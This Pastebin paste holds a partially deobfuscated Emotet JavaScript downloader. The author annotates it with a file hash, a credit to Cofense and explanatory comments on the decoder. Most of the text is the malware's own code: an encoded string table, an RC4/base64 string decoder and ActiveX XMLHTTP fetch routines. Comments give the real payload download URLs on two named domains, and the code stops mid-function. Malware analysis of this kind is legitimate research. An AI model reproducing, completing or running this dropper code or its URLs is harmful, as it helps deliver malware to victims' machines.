Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //From an Emotet .js file recieved on 4.26.2019
- //SHA256 A95B13778F1D7907C0F5E836597F056BABE04CF50A24143CBD0227F595C6A9BE
- //The emotet crew added a new layer of obfuscation and I was curious to see how it worked. This is heavily based upon the work done by Cofense: https://cofense.com/emotet-update-new-c2-communication-followed-new-infection-chain/
- //I just attempted to untangle the main decoder function.
- //Apologies in advance for any of my silly variable names.
- var hexArray = [
- '\x77\x36\x63\x35\x59\x73\x4f\x36\x44\x51\x3d\x3d',
- '\x49\x77\x51\x4b\x65\x48\x2f\x43\x68\x31\x64\x65\x64\x41\x56\x4d\x63\x33\x37\x43\x70\x51\x3d\x3d',
- '\x77\x37\x5a\x53\x77\x37\x6e\x44\x71\x63\x4f\x64',
- '\x4e\x68\x58\x44\x71\x77\x3d\x3d',
- '\x54\x43\x37\x44\x6d\x43\x76\x44\x73\x51\x3d\x3d',
- '\x66\x38\x4b\x68\x77\x72\x6c\x33\x5a\x41\x3d\x3d',
- '\x77\x35\x56\x76\x77\x72\x42\x33\x64\x67\x3d\x3d',
- '\x58\x54\x63\x70\x77\x36\x63\x3d',
- '\x62\x54\x44\x44\x71\x51\x33\x44\x6c\x51\x3d\x3d',
- '\x77\x35\x55\x51\x58\x63\x4f\x35',
- '\x41\x51\x59\x30\x56\x6d\x49\x3d',
- '\x77\x72\x5a\x59\x46\x6d\x5a\x58\x41\x41\x3d\x3d',
- '\x5a\x38\x4f\x4f\x44\x77\x54\x44\x6d\x67\x3d\x3d',
- '\x46\x6d\x7a\x44\x69\x4d\x4b\x4c\x43\x63\x4b\x6e\x77\x34\x66\x44\x76\x63\x4b\x2b\x4a\x6b\x52\x45',
- '\x77\x36\x7a\x43\x75\x6e\x50\x43\x71\x38\x4f\x70',
- '\x45\x77\x66\x43\x71\x42\x74\x48',
- '\x46\x4d\x4f\x4d\x77\x6f\x74\x48\x77\x36\x2f\x43\x75\x52\x6b\x69\x77\x71\x7a\x43\x6c\x73\x4b\x51\x77\x72\x58\x44\x73\x32\x62\x44\x6a\x38\x4b\x31',
- '\x4e\x38\x4b\x31\x57\x47\x7a\x44\x6e\x41\x3d\x3d',
- '\x66\x47\x30\x56\x77\x36\x55\x6e',
- '\x53\x56\x59\x6e\x77\x34\x6b\x64',
- '\x77\x72\x68\x4c\x63\x73\x4f\x61\x77\x36\x73\x3d',
- '\x65\x4d\x4f\x55\x56\x38\x4f\x6f\x4e\x51\x3d\x3d',
- '\x65\x63\x4f\x39\x77\x34\x4c\x43\x74\x73\x4b\x62',
- '\x61\x63\x4b\x4b\x47\x32\x50\x43\x68\x4d\x4f\x30\x77\x72\x55\x62\x55\x77\x3d\x3d',
- '\x53\x38\x4b\x6d\x77\x71\x34\x51\x49\x67\x3d\x3d',
- '\x77\x72\x4c\x43\x6e\x63\x4b\x6c\x77\x36\x2f\x44\x6a\x38\x4f\x73\x77\x6f\x6b\x77\x77\x35\x6e\x44\x6d\x45\x56\x57\x49\x77\x3d\x3d',
- '\x77\x6f\x4e\x4e\x52\x51\x34\x4c',
- '\x77\x72\x42\x4e\x49\x38\x4f\x38\x62\x77\x3d\x3d',
- '\x4c\x48\x33\x44\x6a\x38\x4b\x4c\x58\x4d\x4f\x6d\x77\x70\x76\x43\x72\x73\x4f\x4d\x63\x55\x52\x59\x61\x38\x4f\x64\x77\x6f\x77\x7a\x4f\x31\x4a\x76\x77\x72\x56\x49\x77\x34\x54\x44\x67\x38\x4f\x44\x65\x79\x62\x43\x72\x4d\x4f\x73\x77\x71\x62\x43\x6b\x63\x4f\x52\x66\x73\x4b\x38', //"http://608design.com/mainto/6Cgy/"
- '\x77\x36\x31\x6b\x77\x34\x44\x44\x75\x4d\x4f\x48',
- '\x77\x36\x50\x43\x73\x57\x33\x43\x71\x73\x4f\x70',
- '\x4d\x30\x76\x44\x71\x63\x4f\x59\x4c\x56\x50\x44\x6d\x33\x72\x44\x67\x42\x49\x6b\x77\x37\x49\x72\x57\x46\x44\x44\x6c\x73\x4f\x73\x4e\x6e\x7a\x44\x67\x6a\x5a\x4c\x77\x36\x4d\x7a\x4d\x6c\x39\x5a\x46\x6d\x31\x45\x77\x34\x63\x78\x4c\x51\x3d\x3d', //"https://cssshk.com/wp-admin/gz56/"
- '\x4c\x57\x72\x44\x76\x63\x4b\x59\x77\x34\x63\x3d',
- '\x59\x42\x39\x50\x77\x35\x68\x42',
- '\x4c\x73\x4b\x36\x77\x35\x4d\x64\x77\x36\x59\x3d',
- '\x77\x72\x78\x48\x77\x35\x7a\x44\x6c\x56\x63\x3d',
- '\x46\x77\x50\x44\x69\x44\x31\x71',
- '\x4e\x79\x72\x44\x74\x43\x46\x4a',
- '\x46\x44\x4c\x44\x6e\x6a\x68\x46',
- '\x77\x35\x52\x32\x56\x45\x31\x76',
- '\x4c\x73\x4b\x53\x77\x72\x6b\x50\x77\x72\x76\x44\x75\x6c\x35\x7a\x77\x72\x62\x44\x6f\x38\x4f\x38\x77\x36\x58\x44\x75\x33\x50\x43\x71\x63\x4f\x48\x77\x71\x6a\x43\x73\x63\x4f\x4c\x77\x6f\x55\x51\x77\x37\x6f\x62\x77\x35\x35\x36\x77\x35\x54\x44\x6a\x57\x48\x43\x75\x38\x4b\x6d\x77\x37\x59\x65\x77\x70\x55\x37\x77\x34\x62\x44\x71\x63\x4b\x53\x77\x34\x41\x54\x77\x72\x55\x48\x4b\x73\x4b\x54\x61\x52\x4c\x44\x74\x38\x4b\x75\x77\x36\x77\x46\x42\x73\x4b\x4b\x77\x6f\x72\x43\x72\x48\x51\x64\x77\x71\x68\x35\x77\x35\x66\x44\x70\x38\x4f\x45\x4f\x58\x41\x3d',
- '\x65\x73\x4b\x69\x53\x4d\x4b\x2b',
- '\x4c\x4d\x4b\x54\x58\x47\x73\x3d',
- '\x63\x48\x41\x46\x77\x37\x55\x54',
- '\x63\x73\x4b\x73\x77\x70\x35\x4e',
- '\x77\x35\x77\x70\x77\x35\x5a\x70\x77\x36\x34\x3d',
- '\x47\x38\x4f\x58\x77\x70\x56\x52\x77\x36\x38\x3d',
- '\x56\x42\x51\x37\x77\x35\x70\x2b',
- '\x4b\x38\x4f\x79\x53\x45\x44\x44\x69\x41\x3d\x3d',
- '\x77\x37\x6b\x77\x77\x34\x52\x77\x77\x35\x49\x3d',
- '\x4b\x38\x4f\x72\x77\x72\x39\x2b\x77\x37\x30\x3d',
- '\x77\x72\x5a\x63\x47\x33\x74\x57',
- '\x53\x73\x4b\x6a\x77\x72\x52\x59\x57\x41\x3d\x3d',
- '\x77\x6f\x4c\x44\x6c\x38\x4b\x2f\x63\x4d\x4b\x61',
- '\x77\x37\x63\x4a\x77\x35\x31\x62\x77\x34\x41\x3d',
- '\x77\x36\x38\x70\x77\x37\x4e\x55\x77\x36\x55\x3d',
- '\x59\x77\x6c\x4b\x77\x6f\x37\x43\x74\x51\x3d\x3d',
- '\x4e\x38\x4b\x2f\x52\x6c\x6a\x44\x6e\x51\x3d\x3d',
- '\x77\x6f\x66\x44\x6d\x38\x4b\x4d\x54\x63\x4b\x6d\x77\x6f\x73\x2f\x77\x71\x38\x6d\x45\x38\x4f\x74\x4a\x38\x4f\x55\x77\x70\x58\x43\x71\x56\x76\x44\x6c\x57\x72\x44\x75\x67\x3d\x3d',
- '\x77\x72\x35\x52\x57\x58\x46\x4e\x48\x53\x33\x44\x72\x44\x73\x54\x77\x71\x31\x56\x57\x6a\x4a\x64\x77\x6f\x6a\x44\x6e\x77\x78\x46\x61\x43\x66\x43\x72\x38\x4f\x4c\x77\x37\x68\x6f\x77\x34\x62\x44\x72\x4d\x4f\x4a\x45\x4d\x4b\x2f\x55\x78\x38\x3d',
- '\x62\x79\x39\x4e\x77\x72\x72\x43\x73\x52\x7a\x43\x76\x41\x3d\x3d',
- '\x45\x63\x4f\x57\x77\x6f\x74\x58\x77\x37\x54\x43\x76\x42\x4d\x3d',
- '\x77\x37\x51\x76\x77\x35\x4d\x3d',
- '\x47\x54\x59\x67\x57\x77\x3d\x3d',
- '\x77\x70\x54\x43\x73\x42\x6e\x43\x74\x4d\x4f\x76',
- '\x77\x35\x34\x54\x77\x35\x37\x44\x69\x41\x3d\x3d',
- '\x77\x35\x49\x50\x77\x34\x72\x44\x69\x4d\x4f\x47',
- '\x46\x38\x4f\x42\x77\x6f\x5a\x42\x77\x36\x76\x43\x70\x42\x38\x6a\x77\x36\x49\x3d',
- '\x57\x4d\x4f\x59\x77\x71\x78\x33\x42\x51\x3d\x3d',
- '\x5a\x38\x4f\x59\x77\x71\x35\x68\x49\x67\x3d\x3d',
- '\x66\x7a\x42\x50\x77\x71\x44\x43\x71\x67\x3d\x3d',
- '\x4a\x32\x62\x44\x6c\x63\x4b\x49\x43\x63\x4b\x6c\x77\x35\x45\x3d',
- '\x77\x71\x4e\x57\x49\x38\x4f\x4c\x57\x77\x3d\x3d',
- '\x44\x73\x4f\x6e\x62\x58\x7a\x44\x6a\x38\x4b\x71\x47\x77\x3d\x3d',
- '\x52\x63\x4f\x58\x77\x37\x76\x43\x69\x63\x4b\x4e\x77\x34\x54\x44\x6c\x4d\x4f\x72\x56\x51\x3d\x3d',
- '\x77\x72\x59\x49\x77\x36\x4c\x43\x67\x58\x6b\x3d',
- '\x77\x71\x5a\x44\x47\x57\x46\x4e\x48\x7a\x73\x3d',
- '\x65\x73\x4b\x69\x52\x38\x4b\x6c',
- '\x77\x35\x45\x55\x51\x63\x4f\x7a',
- '\x4f\x4d\x4b\x4f\x77\x35\x66\x44\x76\x51\x35\x73\x77\x36\x77\x3d',
- '\x77\x6f\x42\x54\x53\x73\x4f\x59\x77\x36\x67\x3d',
- '\x59\x56\x68\x41\x77\x71\x76\x44\x6e\x4d\x4b\x7a\x77\x37\x51\x3d',
- '\x77\x35\x52\x79\x77\x34\x6b\x3d',
- '\x53\x38\x4f\x66\x4e\x52\x37\x44\x72\x77\x3d\x3d',
- '\x42\x4d\x4f\x61\x77\x71\x39\x72\x77\x34\x45\x3d',
- '\x4e\x68\x5a\x62\x4b\x47\x63\x3d',
- '\x77\x70\x64\x6f\x66\x4d\x4f\x55\x77\x36\x59\x3d',
- '\x66\x73\x4f\x62\x77\x6f\x70\x67\x4c\x41\x3d\x3d',
- '\x57\x73\x4f\x52\x49\x53\x44\x44\x6f\x51\x3d\x3d',
- '\x77\x6f\x64\x78\x59\x4d\x4f\x4f\x77\x36\x38\x3d',
- '\x77\x70\x68\x70\x65\x67\x73\x61\x77\x36\x66\x43\x6b\x38\x4b\x35\x77\x72\x54\x44\x70\x38\x4f\x77\x77\x34\x67\x75\x53\x54\x6f\x51\x77\x71\x72\x44\x73\x4d\x4b\x6b\x43\x73\x4f\x76\x58\x73\x4f\x5a\x77\x36\x7a\x44\x67\x31\x77\x48\x4c\x73\x4b\x64\x77\x35\x45\x45\x77\x34\x56\x45\x52\x4d\x4f\x73\x66\x67\x64\x79\x77\x37\x7a\x43\x71\x56\x5a\x54\x77\x72\x48\x44\x72\x53\x4c\x44\x74\x6d\x7a\x43\x6b\x58\x46\x76\x49\x63\x4f\x79\x77\x6f\x2f\x44\x73\x43\x37\x44\x71\x31\x6e\x43\x6f\x73\x4f\x57\x77\x35\x42\x37\x47\x58\x6f\x45\x77\x72\x42\x6d\x4e\x73\x4f\x4f\x77\x72\x77\x4e\x45\x38\x4b\x52\x63\x73\x4f\x77\x4a\x77\x3d\x3d',
- '\x54\x38\x4f\x48\x63\x63\x4f\x4b\x48\x51\x3d\x3d',
- '\x77\x35\x48\x43\x70\x56\x33\x43\x6a\x38\x4f\x53',
- '\x4f\x46\x7a\x44\x75\x63\x4f\x4a\x4d\x51\x3d\x3d',
- '\x46\x63\x4b\x63\x77\x35\x63\x72\x77\x36\x59\x3d',
- '\x77\x70\x74\x6e\x77\x36\x6e\x44\x6a\x33\x6b\x3d',
- '\x54\x38\x4f\x6a\x77\x70\x70\x37\x43\x77\x3d\x3d',
- '\x53\x4d\x4f\x62\x77\x36\x7a\x43\x6e\x4d\x4f\x48\x77\x70\x2f\x43\x6b\x73\x4f\x6c\x53\x46\x68\x62\x77\x71\x78\x51\x62\x4d\x4f\x65\x57\x38\x4b\x74\x47\x38\x4b\x35\x59\x73\x4f\x54\x61\x73\x4b\x76\x77\x34\x4c\x43\x6b\x42\x78\x68\x59\x41\x3d\x3d',
- '\x58\x63\x4f\x66\x77\x6f\x46\x44\x4c\x67\x3d\x3d',
- '\x77\x34\x70\x71\x52\x51\x76\x44\x67\x67\x3d\x3d',
- '\x77\x37\x49\x6d\x52\x73\x4f\x53\x4f\x51\x3d\x3d',
- '\x64\x33\x45\x41\x77\x37\x78\x7a\x77\x36\x4c\x44\x76\x4d\x4f\x56\x4b\x63\x4f\x68\x4f\x38\x4f\x64\x4c\x38\x4f\x72\x77\x34\x4c\x43\x6b\x6c\x66\x44\x70\x45\x31\x6a\x4c\x73\x4b\x50\x50\x63\x4f\x4d\x58\x63\x4f\x46\x77\x34\x70\x68',
- '\x77\x34\x4e\x62\x66\x56\x46\x67',
- '\x62\x6e\x41\x34\x77\x35\x73\x48',
- '\x77\x71\x31\x58\x77\x35\x44\x44\x74\x48\x30\x3d',
- '\x4c\x31\x44\x44\x74\x73\x4b\x33\x45\x77\x3d\x3d',
- '\x77\x37\x70\x71\x55\x77\x50\x44\x6e\x63\x4b\x64\x77\x70\x76\x43\x69\x48\x62\x44\x6d\x6b\x6f\x71\x65\x73\x4f\x7a\x77\x72\x31\x4d\x77\x72\x50\x44\x6e\x31\x4c\x43\x6d\x63\x4b\x52\x77\x72\x2f\x43\x73\x73\x4f\x38\x77\x6f\x52\x41',
- '\x44\x38\x4b\x79\x77\x37\x76\x44\x70\x79\x4d\x3d',
- '\x61\x56\x77\x7a\x77\x35\x73\x37',
- '\x77\x37\x39\x36\x77\x71\x78\x63\x62\x51\x3d\x3d',
- '\x4a\x51\x50\x44\x76\x51\x64\x6a',
- '\x48\x47\x54\x43\x76\x69\x6c\x68',
- '\x77\x70\x45\x57\x43\x56\x33\x44\x6f\x63\x4b\x4c',
- '\x4c\x4d\x4b\x5a\x66\x47\x76\x44\x68\x4d\x4f\x68\x77\x36\x73\x41',
- '\x77\x35\x55\x41\x55\x63\x4f\x75\x46\x38\x4f\x4b',
- '\x51\x44\x49\x71\x55\x41\x3d\x3d',
- '\x77\x72\x64\x34\x65\x69\x67\x5a\x77\x72\x6a\x44\x6e\x38\x4f\x2f\x77\x72\x66\x44\x72\x73\x4f\x44\x77\x35\x4d\x72\x53\x79\x5a\x4d',
- '\x4c\x4d\x4b\x31\x77\x35\x62\x44\x68\x51\x6b\x3d',
- '\x77\x35\x58\x43\x72\x73\x4f\x51\x77\x34\x76\x43\x75\x77\x3d\x3d',
- '\x42\x55\x33\x44\x74\x4d\x4b\x2f\x4a\x4d\x4f\x6e\x77\x36\x66\x44\x72\x4d\x4b\x4f\x4c\x45\x46\x51',
- '\x64\x79\x39\x39\x77\x35\x64\x6e',
- '\x77\x36\x7a\x43\x6e\x42\x54\x44\x75\x73\x4b\x34',
- '\x4d\x31\x33\x44\x6c\x4d\x4b\x77\x44\x67\x3d\x3d',
- '\x77\x34\x50\x43\x71\x55\x72\x43\x76\x63\x4b\x39\x77\x34\x5a\x59\x77\x35\x56\x46\x77\x35\x48\x43\x75\x4d\x4f\x58\x77\x72\x78\x69\x77\x37\x49\x3d',
- '\x59\x4d\x4b\x38\x54\x63\x4b\x6a\x46\x67\x3d\x3d',
- '\x77\x37\x45\x48\x57\x73\x4f\x70\x42\x67\x3d\x3d',
- '\x66\x54\x63\x70\x77\x36\x63\x3d',
- '\x77\x70\x45\x42\x77\x36\x2f\x43\x68\x33\x73\x3d',
- '\x50\x4d\x4f\x48\x51\x6c\x66\x44\x70\x67\x3d\x3d',
- '\x77\x37\x55\x55\x52\x63\x4f\x34\x4e\x38\x4f\x58\x77\x71\x59\x2b\x77\x36\x68\x4b',
- '\x77\x36\x5a\x58\x51\x57\x4d\x3d',
- '\x51\x38\x4b\x6a\x55\x73\x4b\x6a\x46\x73\x4b\x74\x77\x37\x34\x64',
- '\x77\x6f\x56\x4a\x66\x4d\x4f\x2f\x77\x36\x6f\x3d',
- '\x52\x38\x4f\x61\x66\x63\x4f\x56\x48\x51\x3d\x3d',
- '\x54\x38\x4b\x63\x50\x78\x77\x6a',
- '\x53\x73\x4f\x6c\x56\x63\x4f\x4d\x4f\x47\x4c\x44\x67\x63\x4f\x2f\x50\x44\x72\x43\x6f\x38\x4f\x6a\x77\x71\x34\x3d',
- '\x54\x33\x51\x64\x77\x34\x73\x38',
- '\x53\x43\x68\x65\x77\x72\x4e\x54\x77\x72\x74\x39\x48\x63\x4f\x68\x77\x72\x6a\x44\x73\x4d\x4f\x6a\x4e\x4d\x4f\x6b\x77\x35\x6e\x44\x75\x6c\x48\x44\x69\x63\x4b\x55\x77\x35\x66\x44\x71\x38\x4b\x54\x46\x4d\x4b\x6a\x77\x35\x6f\x3d',
- '\x77\x72\x62\x44\x6a\x4d\x4b\x64\x57\x63\x4b\x67\x77\x6f\x42\x51\x77\x36\x55\x71\x41\x38\x4f\x67\x4d\x41\x3d\x3d',
- '\x77\x35\x50\x43\x73\x73\x4f\x79\x77\x36\x48\x43\x6c\x4d\x4f\x67\x77\x34\x35\x69\x77\x72\x72\x44\x6a\x42\x46\x47\x65\x67\x3d\x3d',
- '\x77\x36\x5a\x47\x56\x48\x52\x4c\x58\x73\x4b\x71\x77\x72\x49\x72\x55\x73\x4f\x72\x47\x77\x67\x71\x77\x70\x45\x68\x77\x35\x72\x44\x6d\x38\x4f\x77\x56\x4d\x4f\x50\x77\x34\x4d\x31\x55\x78\x6a\x43\x6b\x48\x62\x43\x76\x73\x4b\x5a\x57\x38\x4b\x51\x77\x37\x74\x50\x77\x6f\x6c\x55\x62\x38\x4f\x6c\x59\x73\x4f\x56\x66\x4d\x4b\x52\x42\x4d\x4b\x58\x77\x6f\x72\x44\x75\x6e\x41\x46\x57\x4d\x4f\x31\x77\x71\x64\x2f\x77\x37\x37\x43\x70\x63\x4b\x30\x77\x37\x77\x6f\x77\x71\x56\x75\x54\x32\x41\x72\x77\x34\x73\x67\x77\x6f\x5a\x57\x77\x71\x54\x43\x69\x46\x4d\x4d\x77\x36\x33\x44\x70\x63\x4f\x49\x77\x70\x2f\x43\x69\x73\x4f\x4e\x4a\x41\x48\x44\x73\x73\x4b\x6c\x77\x6f\x72\x43\x76\x6b\x66\x43\x70\x38\x4b\x33\x77\x71\x2f\x43\x6b\x67\x72\x44\x70\x63\x4b\x6c\x57\x48\x4e\x47\x49\x4d\x4f\x4c\x46\x45\x62\x44\x67\x58\x73\x6a\x4d\x4d\x4b\x64\x77\x34\x54\x43\x6c\x79\x44\x43\x6b\x73\x4f\x48\x77\x70\x52\x5a\x77\x6f\x77\x42\x77\x34\x44\x43\x70\x52\x42\x6a\x77\x6f\x73\x63\x77\x72\x77\x44\x77\x36\x72\x44\x71\x73\x4b\x32\x45\x67\x7a\x44\x76\x6a\x33\x43\x75\x42\x68\x61\x77\x6f\x54\x44\x6b\x55\x31\x41\x51\x52\x72\x43\x72\x7a\x72\x44\x6b\x63\x4f\x6d\x61\x69\x37\x43\x6d\x42\x4c\x43\x6b\x38\x4f\x2b\x77\x36\x4e\x69\x77\x35\x4d\x4c\x77\x70\x76\x43\x67\x73\x4b\x75\x64\x4d\x4b\x77\x64\x38\x4f\x67\x77\x35\x37\x44\x6f\x73\x4b\x78\x58\x45\x6e\x43\x6a\x4d\x4f\x44\x77\x71\x54\x44\x73\x4d\x4f\x48\x77\x35\x54\x44\x6a\x51\x3d\x3d',
- '\x77\x72\x4d\x47\x44\x6e\x37\x44\x75\x77\x3d\x3d',
- '\x5a\x73\x4b\x46\x77\x35\x34\x65\x53\x77\x3d\x3d',
- '\x46\x68\x7a\x43\x74\x6a\x42\x73',
- '\x49\x79\x58\x44\x6b\x51\x3d\x3d',
- '\x54\x63\x4f\x34\x77\x37\x76\x43\x70\x38\x4b\x78',
- '\x42\x77\x35\x2b\x41\x6e\x5a\x2b\x4d\x63\x4b\x45\x77\x35\x66\x44\x72\x38\x4f\x62\x61\x4d\x4b\x62\x77\x71\x56\x7a',
- '\x77\x36\x48\x43\x67\x6b\x4c\x43\x69\x73\x4f\x2f',
- '\x77\x35\x58\x43\x6e\x79\x72\x44\x76\x38\x4b\x41\x56\x57\x30\x3d',
- '\x77\x6f\x58\x44\x69\x38\x4b\x2b\x61\x63\x4b\x69',
- '\x49\x7a\x41\x57\x51\x48\x49\x3d',
- '\x59\x63\x4b\x75\x77\x6f\x68\x4c',
- '\x4a\x38\x4f\x4e\x54\x58\x6e\x44\x74\x77\x3d\x3d',
- '\x77\x37\x4c\x43\x74\x7a\x50\x44\x6f\x73\x4b\x52',
- '\x77\x34\x31\x73\x51\x78\x38\x3d',
- '\x49\x38\x4f\x44\x61\x33\x58\x44\x71\x67\x3d\x3d',
- '\x77\x72\x5a\x59\x46\x6d\x5a\x48\x50\x44\x7a\x44\x73\x69\x77\x46\x77\x72\x6f\x3d',
- '\x51\x73\x4b\x77\x77\x70\x39\x59\x65\x77\x3d\x3d',
- '\x77\x36\x64\x58\x77\x70\x4e\x35\x64\x73\x4b\x34',
- '\x54\x38\x4f\x46\x77\x71\x4e\x6e\x46\x43\x66\x43\x6e\x57\x52\x68\x77\x36\x31\x6b',
- '\x77\x37\x6c\x30\x77\x6f\x4a\x62\x56\x41\x3d\x3d',
- '\x5a\x38\x4b\x35\x77\x70\x31\x56\x52\x77\x3d\x3d',
- '\x42\x44\x5a\x79\x41\x56\x38\x3d',
- '\x55\x4d\x4f\x61\x77\x35\x37\x43\x76\x63\x4b\x4c',
- '\x77\x70\x59\x34\x55\x58\x6a\x43\x71\x38\x4f\x4d',
- '\x5a\x63\x4b\x6d\x77\x6f\x4e\x4b\x53\x73\x4f\x56\x77\x71\x37\x43\x68\x58\x54\x43\x6d\x73\x4b\x53',
- '\x44\x6c\x6a\x43\x6d\x77\x73\x3d',
- '\x77\x37\x39\x4a\x64\x58\x4e\x76',
- '\x77\x70\x62\x44\x6e\x38\x4b\x55\x56\x41\x3d\x3d',
- '\x51\x63\x4f\x4d\x77\x36\x7a\x43\x68\x63\x4b\x53\x77\x35\x34\x3d',
- '\x4c\x33\x58\x44\x6f\x38\x4b\x48\x77\x34\x72\x44\x6a\x56\x72\x43\x6e\x63\x4f\x78\x77\x70\x68\x42',
- '\x56\x4d\x4f\x6a\x46\x54\x7a\x44\x6c\x77\x3d\x3d',
- '\x53\x41\x64\x50\x77\x72\x72\x43\x75\x77\x3d\x3d',
- '\x77\x35\x56\x4a\x56\x48\x51\x3d',
- '\x77\x37\x56\x54\x77\x70\x46\x38\x59\x51\x3d\x3d',
- '\x53\x41\x78\x43\x77\x36\x6c\x4b',
- '\x64\x6a\x34\x2b\x77\x36\x68\x77'
- ];
- var decoder = function (arrayIndex, extraHex) {
- arrayIndex = arrayIndex - 0x0;
- var indexValue = hexArray[arrayIndex];
- if (decoder['azsjga'] === undefined) {
- (function () {
- var _0x30ce4e;
- try {
- var _0xfb6156 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
- _0x30ce4e = _0xfb6156();
- } catch (_0x181483) {
- _0x30ce4e = window;
- }
- var base64Chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
- _0x30ce4e['atob'] || (_0x30ce4e['atob'] = function (_0x59e0a0) {
- var _0x124a74 = String(_0x59e0a0)['replace'](/=+$/, '');
- for (var _0x1f24bd = 0x0, _0x1d00db, _0x2f8c13, _0x5c4866 = 0x0, _0x3a06ec = ''; _0x2f8c13 = _0x124a74['charAt'](_0x5c4866++); ~_0x2f8c13 && (_0x1d00db = _0x1f24bd % 0x4 ? _0x1d00db * 0x40 + _0x2f8c13 : _0x2f8c13, _0x1f24bd++ % 0x4) ? _0x3a06ec += String['fromCharCode'](0xff & _0x1d00db >> (-0x2 * _0x1f24bd & 0x6)) : 0x0) {
- _0x2f8c13 = base64Chars['indexOf'](_0x2f8c13);
- }
- return _0x3a06ec;
- });
- }());
- var decodeString = function (encodedString, extraHex) {
- var array1 = [], var1 = 0x0, var2, var3 = '', uriString = '';
- encodedString = atob(encodedString); //decode base-64 encoded string
- //Convert each character in string to a string value, convert it to binary, take only the last two characters. Prefix each character with %
- for (var count = 0x0, base64StringLength = encodedString['length']; count < base64StringLength; count++) {
- uriString += '%' + ('00' + encodedString['charCodeAt'](count)['toString'](0x10))['slice'](-0x2);
- }
- encodedString = decodeURIComponent(uriString);
- //Create array with elements from 0..256
- for (var counter2 = 0x0; counter2 < 0x100; counter2++) {
- array1[counter2] = counter2;
- }
- for (counter2 = 0x0; counter2 < 0x100; counter2++) {
- //Take extraHex character by character, find modulus against extraHex length, add it to the value of array location plus value of var1. Take the modulus against 256 and put it in var1. Do this 256 times.
- var1 = (var1 + array1[counter2] + extraHex['charCodeAt'](counter2 % extraHex['length'])) % 0x100;
- var2 = array1[counter2];
- array1[counter2] = array1[var1]; //replace array count with new value from var1
- array1[var1] = var2; //put value of var2 in the place of var1
- }
- counter2 = 0x0; //clear out counter
- var1 = 0x0; //clear out variable
- for (var counter3 = 0x0; counter3 < encodedString['length']; counter3++) {
- counter2 = (counter2 + 0x1) % 0x100;
- var1 = (var1 + array1[counter2]) % 0x100;
- var2 = array1[counter2];
- array1[counter2] = array1[var1];
- array1[var1] = var2;
- var3 += String['fromCharCode'](encodedString['charCodeAt'](counter3) ^ array1[(array1[counter2] + array1[var1]) % 0x100]);
- }
- return var3;
- };
- decoder['rjrlla'] = decodeString;
- decoder['buKkqm'] = {};
- decoder['azsjga'] = !![];
- }
- var _0x442eaf = decoder['buKkqm'][arrayIndex];
- if (_0x442eaf === undefined) {
- if (decoder['sDKOfx'] === undefined) {
- decoder['sDKOfx'] = !![];
- }
- indexValue = decoder['rjrlla'](indexValue, extraHex);
- decoder['buKkqm'][arrayIndex] = indexValue;
- } else {
- indexValue = _0x442eaf;
- }
- return indexValue;
- };
- function getDataFromUrl(url, responseHandler) {
- var _0xc3557f = {};
- _0xc3557f[decoder('0x0', '\x62\x4d\x52\x73')] = decoder('0x1', '\x71\x5d\x29\x4c');
- _0xc3557f[decoder('0x2', '\x31\x5d\x41\x71')] = decoder('0x3', '\x4c\x64\x6a\x4e');
- _0xc3557f[decoder('0x4', '\x78\x6e\x76\x4b')] = function (_0x2a5334, _0x363968) {
- return _0x2a5334 == _0x363968;
- };
- _0xc3557f[decoder('0x5', '\x34\x2a\x50\x41')] = function (_0x257d9f, _0x363b24, _0x5e2eaa) {
- return _0x257d9f(_0x363b24, _0x5e2eaa);
- };
- try {
- var xmlHttpObject = new ActiveXObject(_0xc3557f[decoder('0x6', '\x2a\x6d\x78\x6e')]);
- xmlHttpObject[decoder('0x7', '\x4a\x5b\x55\x23')](_0xc3557f[decoder('0x8', '\x78\x6e\x76\x4b')], url, ![]);
- xmlHttpObject[decoder('0x9', '\x62\x4d\x52\x73')]();
- if (_0xc3557f[decoder('0xa', '\x71\x5d\x29\x4c')](xmlHttpObject[decoder('0xb', '\x68\x26\x40\x48')], 0xc8)) {
- return _0xc3557f[decoder('0xc', '\x4e\x74\x4d\x5b')](responseHandler, xmlHttpObject[decoder('0xd', '\x26\x47\x21\x63')], ![]);
- } else {
- return _0xc3557f[decoder('0xe', '\x35\x54\x37\x4e')](responseHandler, null, !![]);
- }
- } catch (e) {
- return responseHandler(null, !![]);
- }
- }
- function getData(writeAndExecute) {
- var _0x2a45ee = {};
- _0x2a45ee[decoder('0xf', '\x4f\x24\x43\x29')] = decoder('0x10', '\x53\x6a\x70\x6f');
- _0x2a45ee[decoder('0x11', '\x54\x78\x76\x49')] = decoder('0x12', '\x5b\x4c\x21\x64');
- _0x2a45ee[decoder('0x13', '\x5b\x4c\x21\x64')] = function (_0x501552, _0x29e47f) {
- return _0x501552 + _0x29e47f;
- };
- _0x2a45ee[decoder('0x14', '\x5b\x46\x39\x4d')] = function (_0x318188) {
- return _0x318188();
- };
- _0x2a45ee[decoder('0x15', '\x24\x70\x43\x53')] = function (_0x3dc7d5, _0x644010, _0x5000ce) {
- return _0x3dc7d5(_0x644010, _0x5000ce);
- };
- _0x2a45ee[decoder('0x16', '\x28\x79\x58\x43')] = decoder('0x17', '\x54\x78\x76\x49');
- _0x2a45ee[decoder('0x18', '\x54\x4f\x67\x7a')] = decoder('0x19', '\x24\x30\x50\x65');
- _0x2a45ee[decoder('0x1a', '\x26\x31\x56\x4b')] = function (_0x3f26a3, _0xf980df, _0x2c74ca) {
- return _0x3f26a3(_0xf980df, _0x2c74ca);
- };
- _0x2a45ee[decoder('0x1b', '\x40\x24\x47\x30')] = decoder('0x1c', '\x26\x47\x21\x63'); //$virXF = "http://608design.com/mainto/6Cgy/"
- _0x2a45ee[decoder('0x1d', '\x31\x5d\x41\x71')] = function (_0x1c04a1, _0x18b233, _0x57dfc4) {
- return _0x1c04a1(_0x18b233, _0x57dfc4);
- };
- _0x2a45ee[decoder('0x1e', '\x35\x54\x37\x4e')] = decoder('0x1f', '\x31\x73\x43\x57'); //$vcJOZ = "https://cssshk.com/wp-admin/gz56/"
- var _0x46fd93 = function () {
- var _0x23499e = !![];
- return function (_0x5a4553, _0x2c9e1c) {
- var _0x4747c8 = _0x23499e ? function () {
- if (_0x2c9e1c) {
- var _0x14e2a4 = _0x2c9e1c[decoder('0x20', '\x64\x6f\x74\x73')](_0x5a4553, arguments);
- _0x2c9e1c = null;
- return _0x14e2a4;
- }
- } : function () {
- };
- _0x23499e = ![];
- return _0x4747c8;
- };
- }();
- (function () {
